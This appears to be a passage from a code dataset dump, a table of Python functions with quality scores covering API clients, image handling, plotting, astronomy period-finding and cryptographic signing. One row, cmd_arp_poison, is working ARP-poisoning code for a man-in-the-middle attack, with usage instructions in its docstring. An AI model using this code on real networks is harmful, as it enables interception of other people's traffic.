text
stringlengths 78
104k
| score
float64 0
0.18
|
---|---|
def get_event_questions(self, id, **data):
"""
GET /events/:id/questions/
Eventbrite allows event organizers to add custom questions that attendees fill
out upon registration. This endpoint can be helpful for determining what
custom information is collected and available per event.
This endpoint will return :format:`question`.
"""
return self.get("/events/{0}/questions/".format(id), data=data) | 0.010661 |
def vflip(img):
"""Vertically flip the given PIL Image.
Args:
img (PIL Image): Image to be flipped.
Returns:
PIL Image: Vertically flipped image.
"""
if not _is_pil_image(img):
raise TypeError('img should be PIL Image. Got {}'.format(type(img)))
return img.transpose(Image.FLIP_TOP_BOTTOM) | 0.002933 |
def _load_tags(self,directory):
"""Loads tags from tag file and return
as flickr api compatible string
"""
#FIXME: should check if DB tracking file before using it
# --- Read tags out of file
_tags=''
try:
fullfile=os.path.join(directory,TAG_FILE)
ltags=open(fullfile).readline().split(',')
_tags=''' '''
for tag in ltags:
_tags+='''"'''+tag.strip()+'''" '''
_tags=_tags.strip()
except:
logger.info("No tags found in %s"%(directory))
return _tags | 0.021382 |
def init_region_config(self, region):
"""
Initialize the region's configuration
:param region: Name of the region
"""
self.regions[region] = self.region_config_class(region_name = region, resource_types = self.resource_types) | 0.024735 |
def scale(self, image, geometry, upscale, crop):
"""
Given an image, scales the image down (or up, if ``upscale`` equates
to a boolean ``True``).
:param Image image: This is your engine's ``Image`` object. For
PIL it's PIL.Image.
:param tuple geometry: Geometry of the image in the format of (x,y).
:returns: The scaled image. The returned type depends on your
choice of Engine.
"""
x_image, y_image = map(float, self.get_image_size(image))
# Calculate scaling factor.
factors = (geometry[0] / x_image, geometry[1] / y_image)
factor = max(factors) if crop else min(factors)
if factor < 1 or upscale:
width = toint(x_image * factor)
height = toint(y_image * factor)
image = self._scale(image, width, height)
return image | 0.002257 |
def add_tasks_to_remote(self, pid, path='C:/TDDOWNLOAD/', task_list=[]):
'''
post data:
{
"path":"C:/TDDOWNLOAD/",
"tasks":[{
"url":"ed2k://|file|%E6%B0%B8%E6%81%92.Forever...",
"name":"永恒.Forever.S01E02.中英字幕.WEB-HR.mkv",
"gcid":"",
"cid":"",
"filesize":512807020
}]
}
return data:
{
"tasks": [{
"name": "\u6c38\u6052.Fore76.x264.mkv",
"url": "ed2k://|file|%E6%B0%B8%E6%81%92",
"result": 202,
"taskid": "48",
"msg": "repeate_taskid:48",
"id": 1
}],
"rtn": 0
}
'''
if len(task_list) == 0:
return []
params = {
'pid': pid,
'v': DEFAULT_V,
'ct': DEFAULT_CT,
}
data = {
'path': path,
'tasks': task_list
}
headers = {
'Content-Type': 'application/x-www-form-urlencoded'
}
data = json.dumps(data)
data = quote(data)
data = 'json=' + data
res = self._post(
'createTask',
params=params,
data=data,
headers=headers
)
return res | 0.001456 |
def getSiblings(self, retracted=False):
"""
Returns the list of analyses of the Analysis Request to which this
analysis belongs to, but with the current analysis excluded.
:param retracted: If false, retracted/rejected siblings are dismissed
:type retracted: bool
:return: list of siblings for this analysis
:rtype: list of IAnalysis
"""
request = self.getRequest()
if not request:
return []
siblings = []
retracted_states = [STATE_RETRACTED, STATE_REJECTED]
for sibling in request.getAnalyses(full_objects=True):
if api.get_uid(sibling) == self.UID():
# Exclude me from the list
continue
if not retracted:
if api.get_workflow_status_of(sibling) in retracted_states:
# Exclude retracted analyses
continue
siblings.append(sibling)
return siblings | 0.002006 |
def _init_axes(self, data, method='plot',
xscale=None, sharex=False, sharey=False,
geometry=None, separate=None, **kwargs):
"""Populate this figure with data, creating `Axes` as necessary
"""
if isinstance(sharex, bool):
sharex = "all" if sharex else "none"
if isinstance(sharey, bool):
sharey = "all" if sharey else "none"
# parse keywords
axes_kw = {key: kwargs.pop(key) for key in utils.AXES_PARAMS if
key in kwargs}
# handle geometry and group axes
if geometry is not None and geometry[0] * geometry[1] == len(data):
separate = True
axes_groups = _group_axes_data(data, separate=separate)
if geometry is None:
geometry = (len(axes_groups), 1)
nrows, ncols = geometry
if axes_groups and nrows * ncols != len(axes_groups):
# mismatching data and geometry
raise ValueError("cannot group data into {0} axes with a "
"{1}x{2} grid".format(len(axes_groups), nrows,
ncols))
# create grid spec
gs = GridSpec(nrows, ncols)
axarr = numpy.empty((nrows, ncols), dtype=object)
# set default labels
defxlabel = 'xlabel' not in axes_kw
defylabel = 'ylabel' not in axes_kw
flatdata = [s for group in axes_groups for s in group]
for axis in ('x', 'y'):
unit = _common_axis_unit(flatdata, axis=axis)
if unit:
axes_kw.setdefault('{}label'.format(axis),
unit.to_string('latex_inline_dimensional'))
# create axes for each group and draw each data object
for group, (row, col) in zip_longest(
axes_groups, itertools.product(range(nrows), range(ncols)),
fillvalue=[]):
# create Axes
shared_with = {"none": None, "all": axarr[0, 0],
"row": axarr[row, 0], "col": axarr[0, col]}
axes_kw["sharex"] = shared_with[sharex]
axes_kw["sharey"] = shared_with[sharey]
axes_kw['xscale'] = xscale if xscale else _parse_xscale(group)
ax = axarr[row, col] = self.add_subplot(gs[row, col], **axes_kw)
# plot data
plot_func = getattr(ax, method)
if method in ('imshow', 'pcolormesh'):
for obj in group:
plot_func(obj, **kwargs)
elif group:
plot_func(*group, **kwargs)
# set default axis labels
for axis, share, pos, n, def_ in (
(ax.xaxis, sharex, row, nrows, defxlabel),
(ax.yaxis, sharey, col, ncols, defylabel),
):
# hide label if shared axis and not bottom left panel
if share == 'all' and pos < n - 1:
axis.set_label_text('')
# otherwise set default status
else:
axis.isDefault_label = def_
return self.axes | 0.001265 |
def worker(work_unit):
'''Expects a WorkUnit from coordinated, obtains a config, and runs
traverse_extract_fetch
'''
if 'config' not in work_unit.spec:
raise coordinate.exceptions.ProgrammerError(
'could not run extraction without global config')
web_conf = Config()
unitconf = work_unit.spec['config']
#logger.info(unitconf)
with yakonfig.defaulted_config([coordinate, kvlayer, dblogger, web_conf],
config=unitconf):
traverse_extract_fetch(web_conf, work_unit.key) | 0.003559 |
def start(self):
''' Starts the server. '''
self._app.run(host=self._host, port=self._port) | 0.018692 |
def getScalars(self, inputData):
"""
Returns a numpy array containing the sub-field scalar value(s) for
each sub-field of the ``inputData``. To get the associated field names for
each of the scalar values, call :meth:`.getScalarNames()`.
For a simple scalar encoder, the scalar value is simply the input unmodified.
For category encoders, it is the scalar representing the category string
that is passed in. For the datetime encoder, the scalar value is the
the number of seconds since epoch.
The intent of the scalar representation of a sub-field is to provide a
baseline for measuring error differences. You can compare the scalar value
of the inputData with the scalar value returned from :meth:`.topDownCompute`
on a top-down representation to evaluate prediction accuracy, for example.
:param inputData: The data from the source. This is typically an object with
members
:return: array of scalar values
"""
retVals = numpy.array([])
if self.encoders is not None:
for (name, encoder, offset) in self.encoders:
values = encoder.getScalars(self._getInputValue(inputData, name))
retVals = numpy.hstack((retVals, values))
else:
retVals = numpy.hstack((retVals, inputData))
return retVals | 0.004566 |
def insort_no_dup(lst, item):
"""
If item is not in lst, add item to list at its sorted position
"""
import bisect
ix = bisect.bisect_left(lst, item)
if lst[ix] != item:
lst[ix:ix] = [item] | 0.009009 |
def process_gauge(self, key, fields):
"""
Process a received gauge event
:param key: Key of timer
:param fields: Received fields
"""
try:
self.gauges[key] = float(fields[0])
if self.stats_seen >= maxint:
self.logger.info("hit maxint, reset seen counter")
self.stats_seen = 0
self.stats_seen += 1
except Exception as err:
self.logger.info("error decoding gauge event: %s" % err)
if self.debug:
print "error decoding gauge event: %s" % err | 0.003322 |
def cmd_arp_poison(victim1, victim2, iface, verbose):
"""Send ARP 'is-at' packets to each victim, poisoning their
ARP tables for send the traffic to your system.
Note: If you want a full working Man In The Middle attack, you need
to enable the packet forwarding on your operating system to act like a
router. You can do that using:
# echo 1 > /proc/sys/net/ipv4/ip_forward
Example:
\b
# habu.arpoison 192.168.0.1 192.168.0.77
Ether / ARP is at f4:96:34:e5:ae:1b says 192.168.0.77
Ether / ARP is at f4:96:34:e5:ae:1b says 192.168.0.70
Ether / ARP is at f4:96:34:e5:ae:1b says 192.168.0.77
...
"""
conf.verb = False
if iface:
conf.iface = iface
mac1 = getmacbyip(victim1)
mac2 = getmacbyip(victim2)
pkt1 = Ether(dst=mac1)/ARP(op="is-at", psrc=victim2, pdst=victim1, hwdst=mac1)
pkt2 = Ether(dst=mac2)/ARP(op="is-at", psrc=victim1, pdst=victim2, hwdst=mac2)
try:
while 1:
sendp(pkt1)
sendp(pkt2)
if verbose:
pkt1.show2()
pkt2.show2()
else:
print(pkt1.summary())
print(pkt2.summary())
time.sleep(1)
except KeyboardInterrupt:
pass | 0.002357 |
def create_signature(key_dict, data):
"""
<Purpose>
Return a signature dictionary of the form:
{'keyid': 'f30a0870d026980100c0573bd557394f8c1bbd6...',
'sig': '...'}.
The signing process will use the private key in
key_dict['keyval']['private'] and 'data' to generate the signature.
The following signature schemes are supported:
'RSASSA-PSS'
RFC3447 - RSASSA-PSS
http://www.ietf.org/rfc/rfc3447.
'ed25519'
ed25519 - high-speed high security signatures
http://ed25519.cr.yp.to/
Which signature to generate is determined by the key type of 'key_dict'
and the available cryptography library specified in 'settings'.
>>> ed25519_key = generate_ed25519_key()
>>> data = 'The quick brown fox jumps over the lazy dog'
>>> signature = create_signature(ed25519_key, data)
>>> securesystemslib.formats.SIGNATURE_SCHEMA.matches(signature)
True
>>> len(signature['sig'])
128
>>> rsa_key = generate_rsa_key(2048)
>>> signature = create_signature(rsa_key, data)
>>> securesystemslib.formats.SIGNATURE_SCHEMA.matches(signature)
True
>>> ecdsa_key = generate_ecdsa_key()
>>> signature = create_signature(ecdsa_key, data)
>>> securesystemslib.formats.SIGNATURE_SCHEMA.matches(signature)
True
<Arguments>
key_dict:
A dictionary containing the keys. An example RSA key dict has the
form:
{'keytype': 'rsa',
'scheme': 'rsassa-pss-sha256',
'keyid': 'f30a0870d026980100c0573bd557394f8c1bbd6...',
'keyval': {'public': '-----BEGIN RSA PUBLIC KEY----- ...',
'private': '-----BEGIN RSA PRIVATE KEY----- ...'}}
The public and private keys are strings in PEM format.
data:
Data to be signed. This should be a bytes object; data should be
encoded/serialized before it is passed here. The same value can be be
passed into securesystemslib.verify_signature() (along with the public
key) to later verify the signature.
<Exceptions>
securesystemslib.exceptions.FormatError, if 'key_dict' is improperly
formatted.
securesystemslib.exceptions.UnsupportedAlgorithmError, if 'key_dict'
specifies an unsupported key type or signing scheme.
TypeError, if 'key_dict' contains an invalid keytype.
<Side Effects>
The cryptography library specified in 'settings' is called to perform the
actual signing routine.
<Returns>
A signature dictionary conformant to
'securesystemslib_format.SIGNATURE_SCHEMA'.
"""
# Does 'key_dict' have the correct format?
# This check will ensure 'key_dict' has the appropriate number of objects
# and object types, and that all dict keys are properly named.
# Raise 'securesystemslib.exceptions.FormatError' if the check fails.
# The key type of 'key_dict' must be either 'rsa' or 'ed25519'.
securesystemslib.formats.ANYKEY_SCHEMA.check_match(key_dict)
# Signing the 'data' object requires a private key. 'rsassa-pss-sha256',
# 'ed25519', and 'ecdsa-sha2-nistp256' are the only signing schemes currently
# supported. RSASSA-PSS keys and signatures can be generated and verified by
# pyca_crypto_keys.py, and Ed25519 keys by PyNaCl and PyCA's optimized, pure
# python implementation of Ed25519.
signature = {}
keytype = key_dict['keytype']
scheme = key_dict['scheme']
public = key_dict['keyval']['public']
private = key_dict['keyval']['private']
keyid = key_dict['keyid']
sig = None
if keytype == 'rsa':
if scheme == 'rsassa-pss-sha256':
private = private.replace('\r\n', '\n')
sig, scheme = securesystemslib.pyca_crypto_keys.create_rsa_signature(
private, data, scheme)
else:
raise securesystemslib.exceptions.UnsupportedAlgorithmError('Unsupported'
' RSA signature scheme specified: ' + repr(scheme))
elif keytype == 'ed25519':
public = binascii.unhexlify(public.encode('utf-8'))
private = binascii.unhexlify(private.encode('utf-8'))
sig, scheme = securesystemslib.ed25519_keys.create_signature(
public, private, data, scheme)
elif keytype == 'ecdsa-sha2-nistp256':
sig, scheme = securesystemslib.ecdsa_keys.create_signature(
public, private, data, scheme)
# 'securesystemslib.formats.ANYKEY_SCHEMA' should have detected invalid key
# types. This is a defensive check against an invalid key type.
else: # pragma: no cover
raise TypeError('Invalid key type.')
# Build the signature dictionary to be returned.
# The hexadecimal representation of 'sig' is stored in the signature.
signature['keyid'] = keyid
signature['sig'] = binascii.hexlify(sig).decode()
return signature | 0.007681 |
def sam_send(sock, line_and_data):
"""Send a line to the SAM controller, but don't read it"""
if isinstance(line_and_data, tuple):
line, data = line_and_data
else:
line, data = line_and_data, b''
line = bytes(line, encoding='ascii') + b' \n'
# print('-->', line, data)
sock.sendall(line + data) | 0.002985 |
def writeMultiByte(self, value, charset):
"""
Writes a multibyte string to the datastream using the
specified character set.
@type value: C{str}
@param value: The string value to be written.
@type charset: C{str}
@param charset: The string denoting the character set to use. Possible
character set strings include C{shift-jis}, C{cn-gb},
C{iso-8859-1} and others.
@see: U{Supported character sets on Livedocs (external)
<http://livedocs.adobe.com/flex/201/langref/charset-codes.html>}
"""
if type(value) is unicode:
value = value.encode(charset)
self.stream.write(value) | 0.002825 |
def build_search(self):
"""
Construct the ``Search`` object.
"""
s = self.search()
s = self.query(s, self._query)
s = self.filter(s)
if self.fields:
s = self.highlight(s)
s = self.sort(s)
self.aggregate(s)
return s | 0.006536 |
def get_mean_and_stddevs(self, sites, rup, dists, imt, stddev_types):
"""
See :meth:`superclass method
<.base.GroundShakingIntensityModel.get_mean_and_stddevs>`
for spec of input and result values.
"""
assert all(stddev_type in self.DEFINED_FOR_STANDARD_DEVIATION_TYPES
for stddev_type in stddev_types)
# GMPE differentiates strike-slip, reverse and normal ruptures,
# but combines normal and strike-slip into one category. See page 180.
is_reverse = (45 <= rup.rake <= 135)
stddevs = [numpy.zeros_like(sites.vs30) for _ in stddev_types]
means = numpy.zeros_like(sites.vs30)
[rocks_i] = (sites.vs30 > self.ROCK_VS30).nonzero()
if len(rocks_i):
rrup = dists.rrup.take(rocks_i)
mean_rock = self._get_mean_rock(rup.mag, rup.rake, rrup,
is_reverse, imt)
means.put(rocks_i, mean_rock)
for stddev_arr in stddevs:
stddev_rock = self._get_stddev_rock(rup.mag, imt)
stddev_arr.put(rocks_i, stddev_rock)
[soils_i] = (sites.vs30 <= self.ROCK_VS30).nonzero()
if len(soils_i):
rrup = dists.rrup.take(soils_i)
mean_soil = self._get_mean_deep_soil(rup.mag, rup.rake, rrup,
is_reverse, imt)
means.put(soils_i, mean_soil)
for stddev_arr in stddevs:
stddev_soil = self._get_stddev_deep_soil(rup.mag, imt)
stddev_arr.put(soils_i, stddev_soil)
return means, stddevs | 0.001212 |
def _preprocess_format(self):
"""
Preprocess the format_string attribute.
Splits the format string on each placeholder and returns a list of
tuples containing substring, placeholder name, and function
retrieving content for placeholder (getter).
Relevant placeholder functions (getters) are taken from
'placeholders' attribute which is a dict. If no matching placeholder
is found in 'placeholders' getter is set to None. Getter and
placeholder are also always set to None in first element of the
returned list, because it never contain a real placeholder (read
re.split documentation for further information).
"""
format_split = re.split(r'(?<!\\)%', self.format_string)
preprocessed_format = []
for idx, substr in enumerate(format_split):
if idx == 0:
getter = None
placeholder = None
else:
pattern = MAIN_PATTERN.format(ph=r'\S')
try:
placeholder = re.match(pattern, substr).group('placeholder').strip('[]')
except AttributeError:
placeholder = None
if placeholder == 'S':
self.one_line = True
try:
getter = self.placeholders[placeholder]
except KeyError:
getter = None
substr = re.sub(pattern, '', substr)
format_elem = (substr, placeholder, getter)
preprocessed_format.append(format_elem)
return preprocessed_format | 0.001818 |
def fetch_exemplars(keyword, outfile, n=50):
""" Fetch top lists matching this keyword, then return Twitter screen
names along with the number of different lists on which each appers.. """
list_urls = fetch_lists(keyword, n)
print('found %d lists for %s' % (len(list_urls), keyword))
counts = Counter()
for list_url in list_urls:
counts.update(fetch_list_members(list_url))
# Write to file.
outf = io.open(outfile, 'wt')
for handle in sorted(counts):
outf.write('%s\t%d\n' % (handle, counts[handle]))
outf.close()
print('saved exemplars to', outfile) | 0.001639 |
def set_secondary_vehicle_position(self, m):
'''store second vehicle position for filtering purposes'''
if m.get_type() != 'GLOBAL_POSITION_INT':
return
(lat, lon, heading) = (m.lat*1.0e-7, m.lon*1.0e-7, m.hdg*0.01)
if abs(lat) < 1.0e-3 and abs(lon) < 1.0e-3:
return
self.vehicle2_pos = VehiclePos(m) | 0.005495 |
def execute_cmd(self, *args, **kwargs):
"""Execute a given hpssacli/ssacli command on the controller.
This method executes a given command on the controller.
:params args: a tuple consisting of sub-commands to be appended
after specifying the controller in hpssacli/ssacli command.
:param kwargs: kwargs to be passed to execute() in processutils
:raises: HPSSAOperationError, if hpssacli/ssacli operation failed.
"""
slot = self.properties['Slot']
base_cmd = ("controller", "slot=%s" % slot)
cmd = base_cmd + args
return _ssacli(*cmd, **kwargs) | 0.003135 |
def generate_batch(cls, strategy, size, **kwargs):
"""Generate a batch of instances.
The instances will be created with the given strategy (one of
BUILD_STRATEGY, CREATE_STRATEGY, STUB_STRATEGY).
Args:
strategy (str): the strategy to use for generating the instance.
size (int): the number of instances to generate
Returns:
object list: the generated instances
"""
assert strategy in (enums.STUB_STRATEGY, enums.BUILD_STRATEGY, enums.CREATE_STRATEGY)
batch_action = getattr(cls, '%s_batch' % strategy)
return batch_action(size, **kwargs) | 0.00463 |
def hosts_to_endpoints(hosts, port=2181):
"""
return a list of (host, port) tuples from a given host[:port],... str
"""
endpoints = []
for host in hosts.split(","):
endpoints.append(tuple(host.rsplit(":", 1)) if ":" in host else (host, port))
return endpoints | 0.006873 |
def bls_parallel_pfind(
times, mags, errs,
magsarefluxes=False,
startp=0.1, # by default, search from 0.1 d to...
endp=100.0, # ... 100.0 d -- don't search full timebase
stepsize=1.0e-4,
mintransitduration=0.01, # minimum transit length in phase
maxtransitduration=0.4, # maximum transit length in phase
ndurations=100,
autofreq=True, # figure out f0, nf, and df automatically
blsobjective='likelihood',
blsmethod='fast',
blsoversample=5,
blsmintransits=3,
blsfreqfactor=10.0,
nbestpeaks=5,
periodepsilon=0.1, # 0.1
sigclip=10.0,
verbose=True,
nworkers=None,
):
'''Runs the Box Least Squares Fitting Search for transit-shaped signals.
Breaks up the full frequency space into chunks and passes them to parallel
BLS workers.
Based on the version of BLS in Astropy 3.1:
`astropy.stats.BoxLeastSquares`. If you don't have Astropy 3.1, this module
will fail to import. Note that by default, this implementation of
`bls_parallel_pfind` doesn't use the `.autoperiod()` function from
`BoxLeastSquares` but uses the same auto frequency-grid generation as the
functions in `periodbase.kbls`. If you want to use Astropy's implementation,
set the value of `autofreq` kwarg to 'astropy'. The generated period array
will then be broken up into chunks and sent to the individual workers.
NOTE: the combined BLS spectrum produced by this function is not identical
to that produced by running BLS in one shot for the entire frequency
space. There are differences on the order of 1.0e-3 or so in the respective
peak values, but peaks appear at the same frequencies for both methods. This
is likely due to different aliasing caused by smaller chunks of the
frequency space used by the parallel workers in this function. When in
doubt, confirm results for this parallel implementation by comparing to
those from the serial implementation above.
In particular, when you want to get reliable estimates of the SNR, transit
depth, duration, etc. that Astropy's BLS gives you, rerun `bls_serial_pfind`
with `startp`, and `endp` close to the best period you want to characterize
the transit at. The dict returned from that function contains a `blsmodel`
key, which is the generated model from Astropy's BLS. Use the
`.compute_stats()` method to calculate the required stats.
Parameters
----------
times,mags,errs : np.array
The magnitude/flux time-series to search for transits.
magsarefluxes : bool
If the input measurement values in `mags` and `errs` are in fluxes, set
this to True.
startp,endp : float
The minimum and maximum periods to consider for the transit search.
stepsize : float
The step-size in frequency to use when constructing a frequency grid for
the period search.
mintransitduration,maxtransitduration : float
The minimum and maximum transitdurations (in units of phase) to consider
for the transit search.
ndurations : int
The number of transit durations to use in the period-search.
autofreq : bool or str
If this is True, the values of `stepsize` and `nphasebins` will be
ignored, and these, along with a frequency-grid, will be determined
based on the following relations::
nphasebins = int(ceil(2.0/mintransitduration))
if nphasebins > 3000:
nphasebins = 3000
stepsize = 0.25*mintransitduration/(times.max()-times.min())
minfreq = 1.0/endp
maxfreq = 1.0/startp
nfreq = int(ceil((maxfreq - minfreq)/stepsize))
If this is False, you must set `startp`, `endp`, and `stepsize` as
appropriate.
If this is str == 'astropy', will use the
`astropy.stats.BoxLeastSquares.autoperiod()` function to calculate the
frequency grid instead of the kbls method.
blsobjective : {'likelihood','snr'}
Sets the type of objective to optimize in the `BoxLeastSquares.power()`
function.
blsmethod : {'fast','slow'}
Sets the type of method to use in the `BoxLeastSquares.power()`
function.
blsoversample : {'likelihood','snr'}
Sets the `oversample` kwarg for the `BoxLeastSquares.power()` function.
blsmintransits : int
Sets the `min_n_transits` kwarg for the `BoxLeastSquares.autoperiod()`
function.
blsfreqfactor : float
Sets the `frequency_factor` kwarg for the `BoxLeastSquares.autoperiod()`
function.
periodepsilon : float
The fractional difference between successive values of 'best' periods
when sorting by periodogram power to consider them as separate periods
(as opposed to part of the same periodogram peak). This is used to avoid
broad peaks in the periodogram and make sure the 'best' periods returned
are all actually independent.
nbestpeaks : int
The number of 'best' peaks to return from the periodogram results,
starting from the global maximum of the periodogram peak values.
sigclip : float or int or sequence of two floats/ints or None
If a single float or int, a symmetric sigma-clip will be performed using
the number provided as the sigma-multiplier to cut out from the input
time-series.
If a list of two ints/floats is provided, the function will perform an
'asymmetric' sigma-clip. The first element in this list is the sigma
value to use for fainter flux/mag values; the second element in this
list is the sigma value to use for brighter flux/mag values. For
example, `sigclip=[10., 3.]`, will sigclip out greater than 10-sigma
dimmings and greater than 3-sigma brightenings. Here the meaning of
"dimming" and "brightening" is set by *physics* (not the magnitude
system), which is why the `magsarefluxes` kwarg must be correctly set.
If `sigclip` is None, no sigma-clipping will be performed, and the
time-series (with non-finite elems removed) will be passed through to
the output.
verbose : bool
If this is True, will indicate progress and details about the frequency
grid used for the period search.
nworkers : int or None
The number of parallel workers to launch for period-search. If None,
nworkers = NCPUS.
Returns
-------
dict
This function returns a dict, referred to as an `lspinfo` dict in other
astrobase functions that operate on periodogram results. This is a
standardized format across all astrobase period-finders, and is of the
form below::
{'bestperiod': the best period value in the periodogram,
'bestlspval': the periodogram peak associated with the best period,
'nbestpeaks': the input value of nbestpeaks,
'nbestlspvals': nbestpeaks-size list of best period peak values,
'nbestperiods': nbestpeaks-size list of best periods,
'lspvals': the full array of periodogram powers,
'frequencies': the full array of frequencies considered,
'periods': the full array of periods considered,
'durations': the array of durations used to run BLS,
'blsresult': Astropy BLS result object (BoxLeastSquaresResult),
'blsmodel': Astropy BLS BoxLeastSquares object used for work,
'stepsize': the actual stepsize used,
'nfreq': the actual nfreq used,
'durations': the durations array used,
'mintransitduration': the input mintransitduration,
'maxtransitduration': the input maxtransitdurations,
'method':'bls' -> the name of the period-finder method,
'kwargs':{ dict of all of the input kwargs for record-keeping}}
'''
# get rid of nans first and sigclip
stimes, smags, serrs = sigclip_magseries(times,
mags,
errs,
magsarefluxes=magsarefluxes,
sigclip=sigclip)
# make sure there are enough points to calculate a spectrum
if len(stimes) > 9 and len(smags) > 9 and len(serrs) > 9:
# if we're setting up everything automatically
if isinstance(autofreq, bool) and autofreq:
# use heuristic to figure out best timestep
stepsize = 0.25*mintransitduration/(stimes.max()-stimes.min())
# now figure out the frequencies to use
minfreq = 1.0/endp
maxfreq = 1.0/startp
nfreq = int(npceil((maxfreq - minfreq)/stepsize))
# say what we're using
if verbose:
LOGINFO('min P: %s, max P: %s, nfreq: %s, '
'minfreq: %s, maxfreq: %s' % (startp, endp, nfreq,
minfreq, maxfreq))
LOGINFO('autofreq = True: using AUTOMATIC values for '
'freq stepsize: %s, ndurations: %s, '
'min transit duration: %s, max transit duration: %s' %
(stepsize, ndurations,
mintransitduration, maxtransitduration))
use_autoperiod = False
elif isinstance(autofreq, bool) and not autofreq:
minfreq = 1.0/endp
maxfreq = 1.0/startp
nfreq = int(npceil((maxfreq - minfreq)/stepsize))
# say what we're using
if verbose:
LOGINFO('min P: %s, max P: %s, nfreq: %s, '
'minfreq: %s, maxfreq: %s' % (startp, endp, nfreq,
minfreq, maxfreq))
LOGINFO('autofreq = False: using PROVIDED values for '
'freq stepsize: %s, ndurations: %s, '
'min transit duration: %s, max transit duration: %s' %
(stepsize, ndurations,
mintransitduration, maxtransitduration))
use_autoperiod = False
elif isinstance(autofreq, str) and autofreq == 'astropy':
use_autoperiod = True
minfreq = 1.0/endp
maxfreq = 1.0/startp
else:
LOGERROR("unknown autofreq kwarg encountered. can't continue...")
return None
# check the minimum frequency
if minfreq < (1.0/(stimes.max() - stimes.min())):
minfreq = 2.0/(stimes.max() - stimes.min())
if verbose:
LOGWARNING('the requested max P = %.3f is larger than '
'the time base of the observations = %.3f, '
' will make minfreq = 2 x 1/timebase'
% (endp, stimes.max() - stimes.min()))
LOGINFO('new minfreq: %s, maxfreq: %s' %
(minfreq, maxfreq))
#############################
## NOW RUN BLS IN PARALLEL ##
#############################
# fix number of CPUs if needed
if not nworkers or nworkers > NCPUS:
nworkers = NCPUS
if verbose:
LOGINFO('using %s workers...' % nworkers)
# check if autoperiod is True and get the correct period-grid
if use_autoperiod:
# astropy's BLS requires durations in units of time
durations = nplinspace(mintransitduration*startp,
maxtransitduration*startp,
ndurations)
# set up the correct units for the BLS model
if magsarefluxes:
blsmodel = BoxLeastSquares(
stimes*u.day,
smags*u.dimensionless_unscaled,
dy=serrs*u.dimensionless_unscaled
)
else:
blsmodel = BoxLeastSquares(
stimes*u.day,
smags*u.mag,
dy=serrs*u.mag
)
periods = nparray(
blsmodel.autoperiod(
durations*u.day,
minimum_period=startp,
maximum_period=endp,
minimum_n_transit=blsmintransits,
frequency_factor=blsfreqfactor
)
)
frequencies = 1.0/periods
nfreq = frequencies.size
if verbose:
LOGINFO(
"autofreq = 'astropy', used .autoperiod() with "
"minimum_n_transit = %s, freq_factor = %s "
"to generate the frequency grid" %
(blsmintransits, blsfreqfactor)
)
LOGINFO('stepsize = %s, nfreq = %s, minfreq = %.5f, '
'maxfreq = %.5f, ndurations = %s' %
(abs(frequencies[1] - frequencies[0]),
nfreq,
1.0/periods.max(),
1.0/periods.min(),
durations.size))
del blsmodel
del durations
# otherwise, use kbls method
else:
frequencies = minfreq + nparange(nfreq)*stepsize
# break up the tasks into chunks
csrem = int(fmod(nfreq, nworkers))
csint = int(float(nfreq/nworkers))
chunk_minfreqs, chunk_nfreqs = [], []
for x in range(nworkers):
this_minfreqs = frequencies[x*csint]
# handle usual nfreqs
if x < (nworkers - 1):
this_nfreqs = frequencies[x*csint:x*csint+csint].size
else:
this_nfreqs = frequencies[x*csint:x*csint+csint+csrem].size
chunk_minfreqs.append(this_minfreqs)
chunk_nfreqs.append(this_nfreqs)
# populate the tasks list
#
# task[0] = times
# task[1] = mags
# task[2] = errs
# task[3] = magsarefluxes
# task[4] = minfreq
# task[5] = nfreq
# task[6] = stepsize
# task[7] = nphasebins
# task[8] = mintransitduration
# task[9] = maxtransitduration
# task[10] = blsobjective
# task[11] = blsmethod
# task[12] = blsoversample
# populate the tasks list
tasks = [(stimes, smags, serrs, magsarefluxes,
chunk_minf, chunk_nf, stepsize,
ndurations, mintransitduration, maxtransitduration,
blsobjective, blsmethod, blsoversample)
for (chunk_minf, chunk_nf)
in zip(chunk_minfreqs, chunk_nfreqs)]
if verbose:
for ind, task in enumerate(tasks):
LOGINFO('worker %s: minfreq = %.6f, nfreqs = %s' %
(ind+1, task[4], task[5]))
LOGINFO('running...')
# return tasks
# start the pool
pool = Pool(nworkers)
results = pool.map(_parallel_bls_worker, tasks)
pool.close()
pool.join()
del pool
# now concatenate the output lsp arrays
lsp = npconcatenate([x['power'] for x in results])
periods = 1.0/frequencies
# find the nbestpeaks for the periodogram: 1. sort the lsp array
# by highest value first 2. go down the values until we find
# five values that are separated by at least periodepsilon in
# period
# make sure to get only the finite peaks in the periodogram
# this is needed because BLS may produce infs for some peaks
finitepeakind = npisfinite(lsp)
finlsp = lsp[finitepeakind]
finperiods = periods[finitepeakind]
# make sure that finlsp has finite values before we work on it
try:
bestperiodind = npargmax(finlsp)
except ValueError:
LOGERROR('no finite periodogram values '
'for this mag series, skipping...')
return {'bestperiod':npnan,
'bestlspval':npnan,
'nbestpeaks':nbestpeaks,
'nbestinds':None,
'nbestlspvals':None,
'nbestperiods':None,
'lspvals':None,
'periods':None,
'durations':None,
'method':'bls',
'blsresult':None,
'blsmodel':None,
'kwargs':{'startp':startp,
'endp':endp,
'stepsize':stepsize,
'mintransitduration':mintransitduration,
'maxtransitduration':maxtransitduration,
'ndurations':ndurations,
'blsobjective':blsobjective,
'blsmethod':blsmethod,
'blsoversample':blsoversample,
'autofreq':autofreq,
'periodepsilon':periodepsilon,
'nbestpeaks':nbestpeaks,
'sigclip':sigclip,
'magsarefluxes':magsarefluxes}}
sortedlspind = npargsort(finlsp)[::-1]
sortedlspperiods = finperiods[sortedlspind]
sortedlspvals = finlsp[sortedlspind]
# now get the nbestpeaks
nbestperiods, nbestlspvals, nbestinds, peakcount = (
[finperiods[bestperiodind]],
[finlsp[bestperiodind]],
[bestperiodind],
1
)
prevperiod = sortedlspperiods[0]
# find the best nbestpeaks in the lsp and their periods
for period, lspval, ind in zip(sortedlspperiods,
sortedlspvals,
sortedlspind):
if peakcount == nbestpeaks:
break
perioddiff = abs(period - prevperiod)
bestperiodsdiff = [abs(period - x) for x in nbestperiods]
# this ensures that this period is different from the last
# period and from all the other existing best periods by
# periodepsilon to make sure we jump to an entire different
# peak in the periodogram
if (perioddiff > (periodepsilon*prevperiod) and
all(x > (periodepsilon*period)
for x in bestperiodsdiff)):
nbestperiods.append(period)
nbestlspvals.append(lspval)
nbestinds.append(ind)
peakcount = peakcount + 1
prevperiod = period
# generate the return dict
resultdict = {
'bestperiod':finperiods[bestperiodind],
'bestlspval':finlsp[bestperiodind],
'nbestpeaks':nbestpeaks,
'nbestinds':nbestinds,
'nbestlspvals':nbestlspvals,
